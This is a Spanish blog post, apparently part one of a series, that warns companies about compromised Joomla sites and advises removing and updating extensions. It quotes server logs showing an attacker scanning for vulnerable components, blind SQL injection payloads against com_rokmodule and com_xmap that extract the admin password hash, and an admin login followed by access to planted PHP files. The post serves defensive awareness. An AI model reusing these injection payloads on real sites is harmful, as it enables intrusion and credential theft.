Es habitual que la seguridad pasa a un segundo plano en el mantenimiento de la web corporativa de una empresa y se argumentan las típicas escusas:
-
- Nunca nos pasa pasara.
- Hay millones de web, por que a la nuestra.
- No tenemos nada en la web importante.
- Etc.. etc...
Pero no mas lejos de la realidad, hay mucha mala gente interesada en el potencial de la web. Los usuarios pensando que la web es complemente lítica son infectados con código malicioso o se crean nuevos enlaces de productos ficticios que redirigen a otras web de viagras, pastillas, etc... perjudicando seriamente la reputación de la web y de la empresa, incluso haciendo peligrar las relaciones con los clientes porque han sido infectados a través de la web sin que hayan tomado las medias adecuadas.
Simplemente realizando una pequeña búsqueda en google comprobaremos si nuestra web esta comprometida con enlaces externos:
- site:***** (pharm|viagra)
Donde ***** sera nuestro dominio, ejemplo inode64.com, villarrealcf.es
Otra forma de detectar si estamos siendo atacados, es analizar los registros logs del servidor web, como en este ejemplo:
- 79.142.73.67 - - [11/Apr/2012:05:29:04 +0200] "GET / HTTP/1.1" 200 152204 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:05 +0200] "GET /administrator/ HTTP/1.1" 200 7202 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:05 +0200] "GET /components/ HTTP/1.1" 200 47 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:05 +0200] "GET /modules/ HTTP/1.1" 200 44 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:05 +0200] "HEAD /index.php?option=com_virtuemart&view=siski HTTP/1.1" 303 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:05 +0200] "HEAD /index.php?option=wer_to_cailpso&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:06 +0200] "HEAD /index.php?option=com_realty&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:06 +0200] "HEAD /index.php?option=com_personal&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:06 +0200] "HEAD /index.php?option=com_xmap&view=siski HTTP/1.1" 200 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_rsgallery2&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_play&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_sport&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_etree&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_tag&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_adagency&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_storedirectory&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_myblog&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:11 +0200] "HEAD /index.php?option=com_tpjobs&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:11 +0200] "HEAD /index.php?option=com_rokmodule&view=siski HTTP/1.1" 200 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:11 +0200] "HEAD /index.php?option=com_jootags&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:11 +0200] "HEAD /index.php?option=com_ezautos&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:11 +0200] "HEAD /index.php?option=com_fastball&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:12 +0200] "HEAD /index.php?option=com_file&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:12 +0200] "GET /administrator/index.php HTTP/1.1" 200 7202 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
Vemos que se comprueban diferentes componentes que son conocidos por poseer algun problema de seguridad:
- xmap ( CVE-2010-2678 )
- rsgallery2 ( CVE-2006-6962 )
- Play
- Sport
- Etree
- Tag
- Adgancy
- Storedirectory
- Myblog ( CVE-2010-1540 CVE-2008-6193 CVE-2008-4341 ..... )
- Tpjobs ( CVE-2010-0981)
- rokmodule ( CVE-2010-1479 )
- jootgas
- ezautos
- fasball
- file
- google Maps (/plugins/system/plugin_googlemap2_proxy.php)
Lo primero que hará un atacante es analizar la web, ver que módulos están instalados y realizar pruebas para comprobar si son versiones con problemas de seguridad, y por ultimo realizar el ataque en sin para conseguir privilegios de administrador e inserta el código en la web, puede que entre cada fase pasen días o incluso meses antes que se realice el ataque final. Normalmente los ataques son ejecutados de forma automática y luego de recoger los datos se van eligiendo las webs con más repercusión.
Como este ejemplo, en este caso han encontrado un componente (com_rokmodule) con un problema de seguridad y lo han explotado para modificar la contraseña del administrador.
- 79.142.73.67 - - [11/Apr/2012:05:29:12 +0200] "GET /index.php?option=com_xmap&sitemap=2&Itemid=-18 HTTP/1.1" 200 1280563 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:15 +0200] "GET /index.php?option=com_xmap&sitemap=2&Itemid=-18+union+select+0x666275616c6f6f6e66622d312d,0x666275616c6f6f6e66622d322d,0x666275616c6f6f6e66622d332d,0x666275616c6f6f6e66622d342d,0x666275616c6f6f6e66622d352d,0x666275616c6f6f6e66622d362d,0x666275616c6f6f6e66622d372d,0x666275616c6f6f6e66622d382d-- HTTP/1.1" 200 1281425 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:19 +0200] "GET /index.php?option=com_xmap&sitemap=2&Itemid=-18/*!union*//*!select*/0x666275616c6f6f6e66622d312d,0x666275616c6f6f6e66622d322d,0x666275616c6f6f6e66622d332d,0x666275616c6f6f6e66622d342d,0x666275616c6f6f6e66622d352d,0x666275616c6f6f6e66622d362d,0x666275616c6f6f6e66622d372d,0x666275616c6f6f6e66622d382d-- HTTP/1.1" 200 1281479 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:23 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2 HTTP/1.1" 200 1760 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:23 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2asd' HTTP/1.1" 200 1 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:23 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(1=1) HTTP/1.1" 200 1772 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:23 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(365=365) HTTP/1.1" 200 1776 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:23 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(365=944) HTTP/1.1" 200 1 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:23 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(substr(@@version,1,1)=3) HTTP/1.1" 200 1 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:24 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(substr(@@version,1,1)=4) HTTP/1.1" 200 1 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:24 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(substr(@@version,1,1)=5) HTTP/1.1" 200 1800 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:24 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(select(1)from(%23__users)having(min(1)=1)) HTTP/1.1" 200 1820 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:24 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(1=(/*!select*/length(COUNT(*))from(%23__users)+where+gid=25+having(min(1)=1))) HTTP/1.1" 200 1868 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:24 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(1=(/*!select*/substr(COUNT(*),1,1)from(%23__users)+where+gid=25+having(min(1)=1))) HTTP/1.1" 200 1872 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:24 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(1=(select+length(length(min(id)))+from(%23__users)+where+gid=25+and(id)between(1)and(99999)+having(min(1)=1))) HTTP/1.1" 200 1912 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:24 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(1=(/*!select*/substr(length(min(id)),1,1)from(%23__users)+where+gid=25+and(id)between(1)and(99999)+having(min(1)=1))) HTTP/1.1" 200 1 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- .
- .
- .
- .
- 79.142.73.67 - - [11/Apr/2012:05:32:13 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and((/*!select*/ord(substr(password,65,1))from(%23__users)+where+gid=25+and(id)between(1)and(99999)+having(min(1)=1))between(104)and(115)) HTTP/1.1" 200 1944 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:32:13 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and((/*!select*/ord(substr(password,65,1))from(%23__users)+where+gid=25+and(id)between(1)and(99999)+having(min(1)=1))between(104)and(110)) HTTP/1.1" 200 1944 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:32:14 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and((/*!select*/ord(substr(password,65,1))from(%23__users)+where+gid=25+and(id)between(1)and(99999)+having(min(1)=1))between(104)and(107)) HTTP/1.1" 200 1 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:32:14 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and((/*!select*/ord(substr(password,65,1))from(%23__users)+where+gid=25+and(id)between(1)and(99999)+having(min(1)=1))=108) HTTP/1.1" 200 1 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:32:14 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and((/*!select*/ord(substr(password,65,1))from(%23__users)+where+gid=25+and(id)between(1)and(99999)+having(min(1)=1))=109) HTTP/1.1" 200 1920 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [24/Apr/2012:10:11:37 +0200] "GET /administrator/index.php HTTP/1.1" 200 7202 "-" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:37 +0200] "GET /administrator/index.php HTTP/1.1" 200 7202 "-" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:37 +0200] "POST /administrator/index.php HTTP/1.1" 303 - "http://XXXXXXX/administrator/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:37 +0200] "GET /administrator/index.php HTTP/1.1" 200 37703 "http://XXXXXXX/administrator/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:38 +0200] "GET /administrator/index.php?option=com_admin&task=sysinfo&view=sysinfo HTTP/1.1" 200 98320 "http://XXXXXXX/administrator/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:38 +0200] "GET /administrator/index.php?option=com_plugins&limit=0&limitstart=0&search=legacy HTTP/1.1" 200 29632 "http://XXXXXXX/administrator/index.php?option=com_admin&task=sysinfo&view=sysinfo" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:39 +0200] "GET /administrator/index.php?option=com_installer&element=component HTTP/1.1" 200 27745 "http://XXXXXXX/administrator/index.php?option=com_plugins&limit=0&limitstart=0&search=legacy" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:39 +0200] "POST /administrator/index.php HTTP/1.1" 200 27870 "http://XXXXXXX/administrator/index.php?option=com_installer&element=component" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:39 +0200] "GET /administrator/components/com_dlgu/adminko.php HTTP/1.1" 200 - "http://XXXXXXX/administrator/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:39 +0200] "GET /components/com_dlgu/bmgt.php HTTP/1.1" 200 20214 "-" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
Como recomendación final recomendamos revisar la web y eliminar los módulos, componentes o plugins e incluso plantillas que no se usen y luego que las que queden instaladas comprobar si son las ultimas versión y no hayan problemas de seguridad reportados. En las versiones de Joomla 2.5 y posteriores las actualizaciones son mas fáciles de gestionar , pero cuidado si se modifico el código, porque podríamos dejar la web inoperativa. Igualmente es recomendable buscar experto en seguridad o hablar con los profesionales que hayan realizado la web.
Sigue leyendo la 2º Parte